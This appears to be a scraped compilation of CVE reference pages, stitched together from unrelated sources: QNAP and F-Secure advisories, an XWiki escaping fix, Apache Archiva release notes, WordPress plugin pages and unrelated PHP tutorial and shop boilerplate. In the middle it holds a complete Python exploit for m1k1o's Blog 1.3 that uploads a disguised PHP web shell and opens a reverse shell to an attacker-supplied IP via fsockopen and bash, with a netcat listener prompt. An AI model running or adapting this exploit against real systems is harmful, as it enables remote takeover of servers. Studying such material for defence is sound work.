A cross-site request forgery (CSRF) vulnerability has been reported to affect QNAP device running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Proxy Server: QTS 4.5.x: Proxy Server 1.4.2 ( 2021/12/30 ) and later QuTS hero h5.0.0: Proxy Server 1.4.3 ( 2022/01/18 ) and later QuTScloud c4.5.6: Proxy Server 1.4.2 ( 2021/12/30 ) and later

<< Back to Security Advisory List

*   **Release date:** May 26, 2022
*   **Security ID:** QSA-22-18
*   **Severity:** Medium
*   **CVE identifier:** CVE-2021-34360
*   **Affected products:** QNAP NAS running Proxy Server
*   **Status:** Resolved

**Summary**

A cross-site request forgery (CSRF) vulnerability has been reported to affect QNAP NAS running Proxy Server. If exploited, this vulnerability allows remote attackers to inject malicious code.

We have already fixed this vulnerability in the following versions of Proxy Server:

*   **QTS 4.5.x, QTS 5.0.x:** Proxy Server 1.4.2 (2021/12/30) and later
*   **QuTS hero h5.0.x:** Proxy Server 1.4.3 (2022/01/18) and later
*   **QuTScloud c4.5.x, QuTScloud c5.0.x:** Proxy Server 1.4.2 (2021/12/30) and later

**Recommendation**

To fix the vulnerability, we recommend updating Proxy Server to the latest version.

**Updating Proxy Server**

1.  Log on to QTS, QuTS hero, or QuTScloud as administrator.
2.  Open the **App Center** and then click .  
    A search box appears.
3.  Enter "Proxy Server".  
    Proxy Server appears in the search results.
4.  Click **Update**.  
    A confirmation message appears.  
    **Note:** The **Update** button is not available if your application is already up to date.
5.  Click **OK**.  
    The system updates the application.

**Acknowledgements:** Tony Martin, a security researcher

**Revision History:** V1.0 (May 26, 2022) - Published

CVE-2021-34360: Cross-Site Request Forgery Vulnerability in Proxy Server - Security Advisory

XWiki Platform Wiki UI Main Wiki is a package for managing subwikis. Starting with version 5.3-milestone-2, XWiki Platform Wiki UI Main Wiki contains a possible cross-site scripting vector in the `WikiManager.JoinWiki ` wiki page related to the "requestJoin" field. The issue is patched in versions 12.10.11, 14.0-rc-1, 13.4.7, and 13.10.3. The easiest available workaround is to edit the wiki page `WikiManager.JoinWiki` (with wiki editor) according to the suggestion provided in the GitHub Security Advisory.

Permalink

Browse files

XWIKI-19292: Fix bad escaping

*   Loading branch information

1 parent bd93532 commit 27f839133d41877e538d35fa88274b50a1c00b9b

@@ -245,7 +245,7 @@

&lt;a href="$backUrl" class='button secondary'&gt;{{translation key="platform.wiki.users.join.request.cancel.label"/}}&lt;/a&gt;

&lt;/span&gt;

&lt;input type='hidden' name='wikiId' value="$!wikiId"/&gt;

&lt;input type='hidden' name='requestJoin' value="$!request.requestJoin"/&gt;

&lt;input type='hidden' name='requestJoin' value="$escapetool.xml($!request.requestJoin)"/&gt;

&lt;input type="hidden" name="form\_token" value="$!escapetool.xml($services.csrf.getToken())" /&gt;

&lt;/dl&gt;

&lt;/form&gt;

**0 comments on commit 27f8391**

Please sign in to comment.

CVE-2022-29252: XWIKI-19292: Fix bad escaping · xwiki/xwiki-platform@27f8391

In Apache Archiva, any registered user can reset password for any users. This is fixed in Archiva 2.2.8

The Apache Archiva team is pleased to announce the release of Archiva 2.2.8. Archiva is available for download from the web site.

Archiva is an application for managing one or more remote repositories, including administration, artifact handling, browsing and searching.

This is a security fix release. Users are advised to update their systems to the new version as soon as possible.

For further information see: https://archiva.apache.org/security.html

If you have any questions, please consult:

*   the web site: https://archiva.apache.org/
*   the archiva-user mailing list: https://archiva.apache.org/mailing-lists.html

**New in Archiva 2.2.8**

Apache Archiva 2.2.8 is a security fix release:

**Compatibility Changes**

*   There are no compatibility changes

**New Feature**

*   There are no new features in this release.

**Improvements**

*   There are no improvements

**Bug/Security Fix**

*   CVE-2022-29405 Apache Archiva Arbitrary user password reset vulnerability

**Previous Release Notes**

**Release Notes for Archiva 2.2.7**

Apache Archiva 2.2.7 is a security fix release:

Released: 2022-12-22

**Compatibility Changes**

*   \[MRM-2021\] There is a new flag 'literalVersion=true/false' for service archivaServices/searchService/artifact which allows to change the behaviour for v=LATEST search.

**New Feature**

*   There are no new features in this release.

**Improvements**

*   There are no improvements

**Bug/Security Fix**

*   \[MRM-2027\] Update of the log4j2 version to 2.17.0
*   \[MRM-2020\] Fixed the behaviour of the startup script, if ARCHIVA\_BASE is set (separating installation and data directory)
*   \[MRM-2022\] Fixed the handling of X-XSRF-TOKEN header in Javascript calls

**Release Notes for Archiva 2.2.6**

Apache Archiva 2.2.6 is a security fix release:

Released: 2021-12-15

**Compatibility Changes**

*   No API changes or known side effects.

**New Feature**

*   There are no new features in this release.

**Improvements**

*   There are no improvements

**Bug/Security Fix**

*   Update of the log4j2 version to mitigate the log4j2 vulnerability (CVE-2021-44228)
*   Deactivated directory listings by the file servlet

**Release Notes for Archiva 2.2.5**

Apache Archiva 2.2.5 is a bug fix release:

Released: 2020-06-19

**Compatibility Changes**

*   No API changes or known side effects.

**New Feature**

*   There are no new features in this release.

**Improvements**

*   There are no improvements

**Bug Fix**

*   \[MRM-2008\] Fix for group names with slashes
*   Better handling of LDAP filter

**Release Notes for Archiva 2.2.4**

Apache Archiva 2.2.4 is a bug fix release:

*   Fixes for handling of artifacts
*   Improved validation of REST calls

**Compatibility Changes**

No API changes or known side effects.

Released: 2019-04-30

**New Feature**

*   There are no new features in this release.

**Improvements**

*   Adding additional validation to REST service calls for artifact upload

**Bug Fix**

*   \[MRM-1972\] Stored XSS in Web UI Organization Name
*   \[MRM-1966\] Repository-purge not working
*   \[MRM-1958\] Purge by retention count deletes files but leaves history on website.
*   \[MRM-1929\] Repository purge is not reflected in index

**Release Notes for Archiva 2.2.3**

**New in Archiva 2.2.3**

Apache Archiva 2.2.3 is a bug fix release:

*   Some fixes for the REST API were added to detect requests from unknown origin
*   Some bugfixes were added

**Compatibility Changes**

*   The REST services are now checking for the origin of the requests by analysing Origin and Referer header of the HTTP requests and adding an validation token to the Header. This prevents requests from malicious sites if they are open in the same browser. If you use the REST services from other clients you may change the behaviour with the new configuration properties for the redback security (rest.csrffilter.\*, rest.baseUrl). For more information see Archiva Security Configuration and the Redback REST documentation .
    
    **Note:** If your archiva installation is behind a reverse proxy or load balancer, it may be possible that the Archiva Web UI does not load after the upgrade. If this is the case you may access the WebUI via localhost or edit archiva.xml manually. In the "Redback Runtime Configuration" properties you have to enter the base URLs of your archiva installation to the rest.baseUrl field.
    
*   Archiva uses redback for authentication and authorization in version 2.6

**Change List**

Released: **2017-05-13**

**New Feature**

**Improvement**

*   \[MRM-1925\] - Make User-Agent header configurable for HTTP requests
*   \[MRM-1861\], \[MRM-1924\] - Increasing timeouts for repository check
*   \[MRM-1937\] - Prevent creating initial admin user with wrong name.
*   Adding origin header validation checks for REST requests

**Bug Fix**

*   \[MRM-1859\] - Error upon viewing 'Artifacts' tab when browsing an artifact
*   \[MRM-1874\] - Login Dialog triggers multiple events (+messages)
*   \[MRM-1908\] - Logged on users can write any repository
*   \[MRM-1909\] - Remote repository check fails for https://repo.maven.apache.org/maven2
*   \[MRM-1923\] - Fixing bind issue with certain ldap servers, when user not found
*   \[MRM-1926\] - Invalid checksum files in Archiva repository after download from remote repository
*   \[MRM-1928\] - Bad redirect URL when using Archiva through HTTP reverse proxy
*   \[MRM-1933\] - No message body writer has been found for class org.apache.archiva.rest.services.ArchivaRestError
*   \[MRM-1940\] - Slashes appended to remote repo url

**Release Notes for Archiva 2.2.1**

**New in Archiva 2.2.1**

Apache Archiva 2.2.1 is a bugs fix release:

NOTE: jdk 1.7 is now prerequisite with Apache Archiva 2.2.1

**Compatibility Changes**

If using the Cassandra backend, the metadatafacet column 'key' has been renamed to 'facetKey' in 2.2.0 so you should copy the data to the new column manually. If upgrading from earlier versions of Archiva, the list of libraries in wrapper.conf has changed. If you have customized your copy of wrapper.conf, please update it for compatibility with the version distributed with the current release. As the database storage has been removed, you can remove the JNDI entry for jdbc/archiva.

Refer to the Upgrading Archiva guide for more information.

**List of Changes**

**Improvement**

*   \[MRM-1201\] - Artifact upload success message should mention the classifier
*   \[MRM-1906\] - Allowing filtering of LDAP groups

**Bug Fix**

*   \[MRM-1873\] - archiva doesn't recognise ldap-group to ldap-users mapping
*   \[MRM-1877\] - Checksum files always recreated
*   \[MRM-1879\] - Bug in create-missing-checksum consumer
*   \[MRM-1886\] - View Artifact Content Action does not Work
*   \[MRM-1887\] - Syntax error in DOAP file release section; wrong bug- database URL
*   \[MRM-1892\] - Only One Page of Proxy Connector Rules Shown
*   \[MRM-1893\] - Please delete old releases from mirroring system
*   \[MRM-1896\] - Invalid link to license
*   \[MRM-1914\] - Maven cannot find dependency

**Release Notes for Archiva 2.2.0**

**New in Archiva 2.2.0**

Apache Archiva 2.2.0 is a bugs fix release:

NOTE: jdk 1.7 is now prerequisite with Apache Archiva 2.2.0

**Compatibility Changes**

If using the Cassandra backend, the metadatafacet column 'key' has been renamed to 'facetKey' in 2.2.0 so you should copy the data to the new column manually. If upgrading from earlier versions of Archiva, the list of libraries in wrapper.conf has changed. If you have customized your copy of wrapper.conf, please update it for compatibility with the version distributed with the current release. As the database storage has been removed, you can remove the JNDI entry for jdbc/archiva. After upgrading from a previous version, you will have to run a full scan to populate the new JCR Repository. This will be done on first start of Archiva.

Refer to the Upgrading Archiva guide for more information.

**List of Changes in Archiva 2.2.0**

**New Feature**

*   \[MRM-1867\] - Adding a find jar by checksum functionality to the REST api

**Improvement**

*   \[MRM-1390\] - Generic metadata should be searcheable in Archiva search
*   \[MRM-1844\] - Allow LDAP groupOfNames

**Bug Fix**

*   \[MRM-770\] - Archiva web client does not recognize classifier
*   \[MRM-813\] - Audit log is reporting "Modify File (proxied)" when no proxy connectors exist and the file has not changed
*   \[MRM-837\] - Cannot download SNAPSHOT version
*   \[MRM-935\] - Archiva doesn't supports artifact with _version_SNAPSHOT_/version_
*   \[MRM-1145\] - RSS tests do not correctly check responses
*   \[MRM-1311\] - Logging in ArtifactMissingChecksumsConsumer does not appear in the logs even if configured properly
*   \[MRM-1486\] - ldap.config.mapper.attribute.user.filter using ldap not working correctly with commas.
*   \[MRM-1767\] - When selecting a specific repository to browse, I get an error that I don't have sufficient privileges.
*   \[MRM-1807\] - Archiva wrapper fail to start
*   \[MRM-1810\] - LDAP - groups config not available in Users Runtime Configuration - Properties
*   \[MRM-1811\] - Users - Manage section: pagination needs to change
*   \[MRM-1846\] - Regression in 2.0.1 : uniqueVersion false not supported
*   \[MRM-1848\] - download links for files mult-dot extensions incorrect in Browse view
*   \[MRM-1851\] - generic metadata GUI broken
*   \[MRM-1860\] - ClassNotFound exception with JBoss
*   \[MRM-1863\] - RepositoryGroup URL is not build using the Application URL
*   \[MRM-1864\] - Default configuration for central should now use SSL
*   \[MRM-1871\] - ConcurrentModificationException in DefaultRepositoryProxyConnectors
*   \[MRM-1873\] - archiva doesn't recognise ldap-group to ldap-users mapping

**Task**

*   \[MRM-1359\] - Remove Maven 1.x functionality
*   \[MRM-1865\] - remove isPermanent from Consumer API

**History**

Archiva was started in November 2005, building a simple framework on top of some existing repository conversion tools within the Maven project. Initial development focused on repository conversion, error reporting, and indexing. From January 2006 a web application was started to visualise the information and to start incorporating functionality from the unmaintained maven-proxy project.

Development continued through many stops and starts. Initial versions of Archiva were built from source by contributors, and the first alpha version was not released until April 2007. Some significant changes were made to improve performance and functionality in June 2007 and over the next 6 months and a series of alpha and beta releases, a concerted effort was made to release the 1.0 version.

Archiva became an Apache "top level project" in March 2008.

CVE-2022-29405: Archiva Documentation – Release Notes for Archiva 2.2.8

A Cross-Site Request Forgery (CSRF) in XXL-Job v2.3.0 allows attackers to arbitrarily create administrator accounts via the component /gaia-job-admin/user/add.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-29002: xxl-job-admin v2.3.0 has a CSRF vulnerability, which can be used to create an administrator account、Modify password, perform task scheduling and other operations · Issue #2821 · xuxueli/xxl-job

Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.

**PHP Data Objects (PDO)**

*   PDO – PHP database extension
*   How to use PDO to insert data into the database?
*   How to use PDO to read data from the database?
*   How to use PDO to update the database?
*   How to delete records?
*   PHP CRUD Operation using PDO Extension
*   Signup and Login operation using PDO
*   Password Hashing in PHP using PDO

**PHP OOP Concepts**

*   Basics Of OOPs in PHP
*   How to create classes and objects?
*   The $this keyword
*   Chaining methods and properties
*   Access modifiers: public vs. private
*   Magic Methods
*   The \_\_construct() magic method
*   Inheritance in PHP
*   Multilevel and Multiple inheritances in PHP

**CodeIgniter**

*   CI Introduction
*   CI Directory Structure
*   CI Controllers
*   CI Model
*   CI View
*   CI Libraries
*   CI Helpers
*   CI Plugins
*   How to create form in CI

**HTML**

*   HTML Introduction
*   HTML Useful Tags
*   HTML Text Formats
*   HTML Links
*   HTML Images
*   HTML Lists
*   HTML Forms
*   HTML Table
*   Content Style in HTML

**MySQL**

*   MySQL Introduction
*   MySQL Command-line
*   MySQL GUI Tools
*   MySQL Users
*   MySQL PHP Connections
*   MySQLi Procedural Functions
*   MySQL Data Type
*   MySQL Database and Tables
*   MySQL Column Modifiers

**Interview QAs**

*   PHP Interview Questions and Answers for Fresher
*   Basic PHP Programs
*   PHP Programming/ Logical Interview questions and answers
*   WordPress Interview Questions and Answers
*   MySQL Interview Question and Answers
*   Common SQL Interview Questions and Answers
*   CodeIgniter Interview Questions and Answers

**WordPress**

*   What is wordpress?
*   WordPress.com vs. WordPress.org
*   WordPress Installation
*   Logging Into Your New WordPress Site
*   WordPress Directory and File Structure
*   WordPress DB Structure & Schema

**PHP with Mysqli**

*   How to Connect PHP with MySQL Database
*   How to insert data into MySql using PHP
*   How to fetch data from MySQL using PHP
*   CRUD operation using PHP and MySQLi
*   User Signup and Sign in using HTML and PHP
*   How to change Password in PHP
*   User login and login tracking using PHP
*   How to check Email and username availability live using jquery/ajax
*   jQuery Dependent DropDown List – States and Districts
*   How to Send Mail Using PHP
*   PHP Email Verification Script
*   How to fetch data in excel or generate excel file in PHP
*   How to prevent Cross-Site Request Forgery (CSRF) in PHP
*   User registration with server-side validation using PHP
*   How to create a Shopping Cart in PHP
*   How to delete multiple records in PHP
*   PHP login with remember me function
*   How to create pagination in PHP
*   How to Create pagination using PHP and MySQLi(with the page number)
*   How to Dynamically Add / Remove input fields in PHP with Jquery Ajax
*   How to send email from localhost using PHP
*   How to use multiple insert queries in PHP
*   CRUD operation with Image Using PHP and MySQLi

**Other PHP Tutorials**

*   Time Ago Script in PHP
*   Get City Country By IP Address in PHP
*   Hit counter in PHP
*   Captcha Image Verification in PHP
*   Server Side form Validation in PHP
*   Date And Time Formatting With PHP
*   How to get Current Indian time in PHP
*   How to get Browser Information In PHP
*   How to convert number to String in PHP
*   How to get current page URL in PHP
*   How to get yesterday and tomorrow date in PHP
*   How to change date format in PHP

As technology keeps updating itself… so do we need to. Advancement in technology is the key to innovation through which you enjoy things you couldn’t a decade ago. Similarly, any Programming language basics keep on updating; it is essential for you to also get trained on all the latest features and the basics while learning a programming language.

PHPGurukul provides you with **PHP Latest tutorials** such as PHP CRUD operations using Procedure or MySQL group, and we keep on adding the latest functionalities tutorials to our website. Apart from these tutorials, we offer some great and usual benefits which will help you in your PHP career, and those are below:

*   You can easily get **PHP Projects Idea** through our website, which you would require when you learn PHP and want to try out something on your own. It all starts with an idea, of course.
*   Our website provides **PHP Tutorials for Students,** and you can also purchase Project reports from PHP gurukul for your submissions in college/universities.
*   Any programming language is tough to learn, but it becomes easier and fun to learn when you start with the basics. Our **PHP Tutorials for beginners** help you to learn from the basics till you learn the advanced concepts of PHP.
*   When you are doing web development apart from scripting languages like HTML, JavaScript, you should also know **PHP oops Concepts,** which are well explained in our tutorials to help you excel in PHP.

PHPGurukul also offers **PHP Projects** available for download in a few and easy steps that you can use directly or can customize as per your needs as PHP is an open-source scripting language. You can opt for free PHP Projects or go for our special Paid PHP Projects with additional features that are good for learning and professional usage.

You can enjoy the tutorials with special advanced concepts, go through Interview Q&A, or download the required PHP Projects with Project reports within no time using our website.

CVE-2022-29004: PHP Project, PHP Projects Ideas, PHP Latest tutorials, PHP oops Concept

Lumidek Associates Simple Food Website 1.0 is vulnerable to Cross Site Request Forgery (CSRF) which allows anyone to takeover admin/moderater account.

Comment

All orders are processed in USD. While the content of your cart is currently displayed in CYN, you will checkout using USD at the most current exchange rate.

**Out of stock**

Some items are no longer available. Your cart has been updated.

Have a Coupon code?

CVE-2022-30014: lumidek.com

m1k1o's Blog versions 1.3 and below suffer from an authenticated remote code execution vulnerability.

    # Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-01-06# Exploit Author: Malte V# Vendor Homepage: https://github.com/m1k1o/blog# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip# Version: 1.3 and below# Tested on: Linux# CVE : CVE-2022-23626import argparseimport jsonimport refrom base64 import b64encodeimport requests as reqfrom bs4 import BeautifulSoupparser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',                    required=False)parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,                    required=False)parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,                    required=False)parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)args = vars(parser.parse_args())username = args['username']password = args['password']lhost_ip = args['ip']lhost_port = args['lport']address = args['url']port = args['port']url = f"http://{address}:{port}"blog_cookie = ""csrf_token = ""exploit_file_name = ""header = {    "Host": f"{address}",    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",    "X-Requested-With": "XMLHttpRequest",    "Csrf-Token": f"{csrf_token}",    "Cookie": f"PHPSESSID={blog_cookie}"}def get_cookie(complete_url):    global blog_cookie    cookie_header = {}    if not blog_cookie:        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"    result = req.get(url=complete_url, headers=cookie_header)    if result.status_code == 200:        blog_cookie = result.cookies.get_dict()['PHPSESSID']        print(f'[+] Found PHPSESSID: {blog_cookie}')        grep_csrf(result)def grep_csrf(result):    global csrf_token    csrf_regex = r"[a-f0-9]{10}"    soup = BeautifulSoup(result.text, 'html.parser')    script_tag = str(soup.findAll('script')[1].contents[0])    csrf_token = re.search(csrf_regex, script_tag).group(0)    print(f'[+] Found CSRF-Token: {csrf_token}')def login(username, password):    get_cookie(url)    login_url = f"{url}/ajax.php"    login_data = f"action=login&nick={username}&pass={password}"    login_header = {        "Host": f"{address}",        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    result = req.post(url=login_url, headers=login_header, data=login_data)    soup = BeautifulSoup(result.text, 'html.parser')    login_content = json.loads(soup.text)    if login_content.get('logged_in'):        print('[*] Successful login')    else:        print('[!] Bad login')def set_cookie(result):    global blog_cookie    blog_cookie = result.cookies.get_dict()['PHPSESSID']def generate_payload(command):    return f"""-----------------------------13148889121752486353560141292Content-Disposition: form-data; name="file"; filename="malicious.gif.php"Content-Type: application/x-httpd-phpGIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;-----------------------------13148889121752486353560141292--"""def send_payload():    payload_header = {        "Host": f"{address}",        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "X-Requested-With": "XMLHttpRequest",        "Csrf-Token": f"{csrf_token}",        "Cookie": f"PHPSESSID={blog_cookie}"    }    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"    payload = generate_payload(command)    print(f"[+] Upload exploit")    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})    set_exploit_file_name(result.content.decode('ascii'))def set_exploit_file_name(data):    global exploit_file_name    file_regex = r"[a-zA-Z0-9]{4,5}.php"    exploit_file_name = re.search(file_regex, data).group(0)def call_malicious_php(file_name):    global header    complete_url = f"{url}/data/i/{file_name}"    print('[*] Calling reverse shell')    result = req.get(url=complete_url)def check_reverse_shell():    yes = {'yes', 'y', 'ye', ''}    no = {'no', 'n'}    choice = input("Have you got an active netcat listener (y/Y or n/N): ")    if choice in yes:        return True    elif choice in no:        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")        return Falsedef main():    enabled_listener = check_reverse_shell()    if enabled_listener:        login(username, password)        send_payload()        call_malicious_php(exploit_file_name)if __name__ == "__main__":    main()

m1k1o's Blog 1.3 Remote Code Execution

Multiple Denial-of-Service vulnerabilities was discovered in the F-Secure Atlant and in certain WithSecure products while scanning fuzzed PE32-bit files cause memory corruption and heap buffer overflow which eventually can crash the scanning engine. The exploit can be triggered remotely by an attacker.

2022-05-23 CVE-2022-28874: Multiple Denial-of-Service (DoS) Vulnerabilities

Multiple denial-of-service (DoS) vulnerabilities while scanning fuzzed PE32-bit files can eventually crash the scanning engine. 

More 2022-04-25 CVE-2022-28871: Denial-of-Service (DoS) Vulnerability

A denial-of-service (DoS) vulnerability in WithSecure component may crash the scanning engine. 

More 2022-04-13 CVE-2022-22965: Vulnerability in Spring Framework Remote Code Execution affect WithSecure Products

A critical vulnerability in the Spring framework affects the following products: F-Secure Policy Manager, F-Secure Policy Manager for Linux, F-Secure Policy Manager Proxy, and F-Secure Elements Connector.

More 2022-03-07 CVE-2021-44750: Arbitrary Code Execution

WithSecure Support Tool (fsdiag) embedded within various WithSecure products for Microsoft Windows can be abused to execute arbitrary commands on the system.

More 2022-03-01 CVE-2021-44749: Universal Cross-Site Scripting Vulnerability in WithSecure SAFE Browser Protection for Android

Vulnerabilities in the browser protection of WithSecure SAFE for Android could allow remote attacker to steal user's sessions cookie.

More 2022-03-01 CVE-2021-44748: Universal Cross-Site Scripting Vulnerability in WithSecure SAFE Browser for Android

Vulnerabilities in the browser of WithSecure SAFE for Android could allow execution of JavaScript. 

More 2022-02-27 CVE-2021-44747: Denial-of-Service (DoS) Vulnerability

Crash while scanning fuzzed files can cause denial-of-service of the antivirus engine.

More 2022-02-07 CVE-2021-40837: Denial-of-Service (DoS) Vulnerability More 2021-12-20 CVE-2021-40836: Denial-of-Service (DoS) Vulnerability More 2021-12-14 CVE-2021-40835: URL Address Bar Spoofing in F-Secure SAFE Browser for iOS More 2021-12-08 CVE-2021-40834: User interface Spoofing in F-Secure SAFE browser for Android More 2021-11-24 CVE-2021-40833: Denial-of-Service (DoS) Vulnerability More 2021-10-06 CVE-2021-40832: Denial-of-Service (DoS) Vulnerability More 2021-10-06 CVE-2021-33603: Denial-of-Service (DoS) Vulnerability More 2021-10-04 CVE-2021-33602: Denial-of-Service (DoS) Vulnerability More 2021-09-26 CVE-2021-33601: Arbitrary Code Execution in Web Interface of F-Secure Internet Gatekeeper More 2021-09-26 CVE-2021-33600: Denial-of-Service Vulnerability in Web Interface of F-Secure Internet Gatekeeper More 2021-09-01 CVE-2021-33599: Denial-of-Service (DoS) Vulnerability More 2021-08-21 CVE-2021-33598: Denial-of-Service (DoS) Vulnerability More 2021-08-09 CVE-2021-33596: Fake Apple Login Prompt in F-Secure SAFE Browser for iOS More 2021-08-09 CVE-2021-33595: F-Secure SAFE Browser for iOS Vulnerable to Address Bar Spoofing More 2021-08-09 CVE-2021-33594: F-Secure SAFE Browser for Android Vulnerable to Address Bar Spoofing More 2021-08-07 CVE-2021-33597: Denial-of-Service (DoS) Vulnerability More 2021-06-01 CVE-2021-33572: Denial-of-Service (DoS) Vulnerability More 2021-01-25 FSC-2021-1: Reflected Cross-Site Scripting Vulnerability in F-Secure Cloud Protection for Salesforce More 2020-11-10 FSC-2020-3: Multiple Buffer Overflow Vulnerabilities in F-Secure Linux Security

Multiple buffer overflow vulnerabilities can lead local privilege escalation.

More 2020-05-17 FSC-2020-2: Local Non-Root User Can Rename or Delete System FIles in Linux Security

A local user can rename or delete arbitrary files owned by root in Linux Security.

More 2020-05-17 FSC-2020-1: CSRF Vulnerability in Web Interface of Linux Security

Vulnerability in web user interface of the F-Secure Linux Security can lead to remotely disable product settings.

More

CVE-2022-28874: Security advisories

Cross-Site Request Forgery (CSRF) vulnerability in KubiQ CPT base plugin <= 5.8 at WordPress allows an attacker to delete the CPT base.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Remove custom post type base slug from url

*   possibility to select specific custom post type(s)
*   auto redirect old slugs to no-base slugs

1.  Upload remove-cpt-base directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress

I easily removed the services slug from the link

Very simple plugin, but works perfectly! 🎉

A simple but efficient plugin that works like charm... 🙂

couldnt get the slug remove done with custom code on one particular site for whatever reason ... but this little thing works flawlessly! thanks - please keep it up!! 🙂

Read all 18 reviews

“Remove CPT base” is open source software. The following people have contributed to this plugin.

Contributors

*    kubiq

**5.9**

*   added nonce and security checks

**5.8**

*   tested on WP 5.9

**5.7**

*   tested on WP 5.5
*   minor fix

**5.6**

*   tested again with WPML, Polylang and Custom Post Type Permalinks and fixed

**5.5**

*   tested on WP 5.5
*   another fix for Custom Post Type Permalinks plugin

**5.4**

*   enable previews for CPTs without base

**5.3**

*   make it works with WPML
*   make it works with Polylang
*   make it works with Custom Post Type Permalinks plugin

**5.2**

*   tested on WP 5.4

**5.1**

*   removed auto-prevent slug duplicates
*   removed debug mode
*   removed remove\_cpt\_base\_skip filter
*   use default WP function instead of custom
*   make it works for custom rewrite slugs
*   prioritize page and post like WP does

**5.0**

*   YOU HAVE TO SAVE YOUR SETTINGS AGAIN, because:
*   added alternation option for each post type separately
*   added debug mode

**4.8**

*   fix alternative CPT children solving for nested children

**4.7**

*   alternative CPT children solving

**4.6**

*   fix server port redirect

**4.5**

*   make it works for WP installations in directory

**4.4**

*   minor changes

**4.3**

*   fix for some endpoints and make sure post is not interpreted as attachment

**4.2**

*   fix for hierarchical CPTs on some servers

**4.1**

*   make it works for posts interpreted like category by WP

**4.0**

*   tested on WP 5.2
*   make it works for hierarchical post types and different permalink structures
*   going back to ‘pre\_get\_posts’
*   optimize generating slug for duplicate names

**3.3**

*   change HTTP code from 404 to 200

**3.2**

*   fix for query strings

**3.1**

*   add custom endpoint rewrites support

**3.0**

*   stop using complicated ‘pre\_get\_posts’ and handle 404 instead

**2.3**

*   tested on WP 5.0

**2.2**

*   fix 404

**2.1**

*   fix redirect loop in WPML and WooCommerce

**2.0**

*   stop using .htaccess rules

**1.2**

*   auto init after permalinks updated

**1.1**

*   add uninstall hook
*   add duplicate slug check
*   minor updates

**1.0**

*   First version

CVE-2022-29431: Remove CPT base

Cross-Site Scripting (XSS) vulnerability in KubiQ's PNG to JPG plugin <= 4.0 at WordPress via Cross-Site Request Forgery (CSRF). Vulnerable parameter &jpg_quality.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Convert PNG images to JPG, free up web space and speed up your webpage

*   set quality of converted JPG
*   auto convert on upload
*   auto convert on upload only when PNG has no transparency
*   only convert image if JPG filesize is lower than PNG filesize
*   leave original PNG images on the server
*   convert existing PNG image to JPG
*   bulk convert existing PNG images to JPG
*   conversion statistics

1.  Upload png-to-jpg directory to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress

Best work, fast speed when png convert to jpg

I had a client site where the developers used ALL PNG IMAGES and it was SLOW. Thank you for this awesome plugin you saved me a ton of time not having to convert manually & re-upload via GIMP!

Easy to use and efficient. The bulk convert page loads fast, the images were generated and replaced neatly. I saved over 80MB converting approximately 350 PNGs, and this was only a test run. Lovely plugin!

The plugin converts the format and replaces the address in the database well and without any problems. Be sure to back up before use to avoid problems

I used it on WordPress 5.7.1. The plugin does what it should do. Converting 200 images took about 3 minutes. I hope it will be updated soon. Using old plugins is always a bit scary.

Плагин нашел лишь малую часть моих PNG. Затем заменил полноразмерные png на jpg при этом они все исчезли из тех записей где стояли. Также (!) уменьшенные варианты этих же изображений ОН ОСТАВИЛ В ТОМ ЖЕ ФОРМАТЕ PNG. Таким образом были убиты самые большие PNG и больше ничего не изменилось. Я это делал птому что у меня есть backup сайта 🙂

Read all 32 reviews

“PNG to JPG” is open source software. The following people have contributed to this plugin.

Contributors

*    kubiq

**4.1**

*   added nonce and security checks
*   added button to stop transparency detection or conversion process
*   removed DB prefix from notice table names to make it more readable
*   remove preview box flex centering to make it works with bigger images
*   auto delete PNG backup when JPG deleted in admin

**4.0**

*   replace images also in post\_excerpt
*   separate SQL queries
*   added support for FV Player plugin

**3.9.1**

*   tested on WP 5.9
